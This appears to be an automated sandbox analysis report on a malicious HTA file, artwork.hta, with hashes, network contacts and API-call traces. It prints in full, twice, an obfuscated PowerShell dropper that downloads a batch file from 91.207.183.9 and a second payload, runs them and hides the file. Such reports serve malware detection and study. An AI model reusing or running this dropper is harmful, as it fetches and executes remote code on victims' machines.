
artwork.hta

Generic Malware Antivirus PowerShell
Category Machine Started Completed
FILE s1_win7_x6401 Oct. 17, 2023, 9:41 a.m. Oct. 17, 2023, 9:43 a.m.
Size 16.8KB
Type HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 b3a69d39ea2f074e520077721b475d51
SHA256 8e28ddc558064889072da509008e162887252a6237d305b528620508b450f725
CRC32 EA325F01
ssdeep 192:WqgAUxKcGb+e64JVHzWPUgPYL1eKfTQhDcqsOHQXhSnP:dgA/RFOf
Yara None matched

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\artwork.hta

    2556
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA 
@(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT;

      2652

Name Response Post-Analysis Lookup
www2.lunapic.com 72.9.146.243
IP Address Status Action
164.124.101.2 Active Moloch
72.9.146.243 Active Moloch
91.207.183.9 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:984
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $G
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: ByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjn
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: KZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($B
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: hpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){pow
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: ershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWi
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: th((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySp
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: BOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeo
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: GSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHX
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: I.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXg
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: EUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjn
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: KZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,5347
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: 1,53477));[Net.ServicePointManager]:: <<<< SecurityProtocol = [Net.SecurityProt
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: ocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXb
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: Hysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$Jn
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: ufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppD
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: ata + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518
console_handle: 0x0000012b
1 1 0

WriteConsoleW

buffer: ';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQy
console_handle: 0x00000137
1 1 0

WriteConsoleW

buffer: gQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53
console_handle: 0x00000143
1 1 0

WriteConsoleW

buffer: 416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH
console_handle: 0x00000197
1 1 0

WriteConsoleW

buffer: $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAX
console_handle: 0x000001a3
1 1 0

WriteConsoleW

buffer: g + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}
console_handle: 0x000001af
1 1 0

WriteConsoleW

buffer: Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,534
console_handle: 0x000001bb
1 1 0

WriteConsoleW

buffer: ,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDno
console_handle: 0x000001df
1 1 0

WriteConsoleW

buffer: aE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT;
console_handle: 0x000001eb
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x000001f7
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x00000203
1 1 0

WriteConsoleW

buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti
console_handle: 0x0000001b
1 1 0

WriteConsoleW

buffer: on was closed: An unexpected error occurred on a send."
console_handle: 0x00000027
1 1 0

WriteConsoleW

buffer: At line:1 char:1076
console_handle: 0x00000033
1 1 0

WriteConsoleW

buffer: + function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $G
console_handle: 0x0000003f
1 1 0

WriteConsoleW

buffer: ByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjn
console_handle: 0x0000004b
1 1 0

WriteConsoleW

buffer: KZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($B
console_handle: 0x00000057
1 1 0

WriteConsoleW

buffer: hpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){pow
console_handle: 0x00000063
1 1 0

WriteConsoleW

buffer: ershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWi
console_handle: 0x0000006f
1 1 0

WriteConsoleW

buffer: th((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $
console_handle: 0x0000007b
1 1 0

WriteConsoleW

buffer: BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySp
console_handle: 0x00000087
1 1 0

WriteConsoleW

buffer: BOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeo
console_handle: 0x00000093
1 1 0

WriteConsoleW

buffer: GSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHX
console_handle: 0x0000009f
1 1 0

WriteConsoleW

buffer: I.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXg
console_handle: 0x000000ab
1 1 0

WriteConsoleW

buffer: EUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjn
console_handle: 0x000000b7
1 1 0

WriteConsoleW

buffer: KZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,5347
console_handle: 0x000000c3
1 1 0

WriteConsoleW

buffer: 1,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolTy
console_handle: 0x000000d3
1 1 0

WriteConsoleW

buffer: pe]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData <<<< ($gZGtloGwxbqkVPKJdOb);
console_handle: 0x000000df
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067eaf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f4f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f4f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f4f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f4f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f4f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f4f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067e938
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067e938
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067e938
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f1f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0067f5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002fd3c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002fdac0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002fdac0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002fdac0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header, Connection to IP address
suspicious_request GET http://91.207.183.9:8000/main.bat
request GET http://91.207.183.9:8000/main.bat
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02830000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02890000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2652
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x717e1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2652
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x717e2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02891000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02892000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0279a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02792000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0279c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02793000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02794000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02795000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02796000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02797000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02798000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02799000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05030000
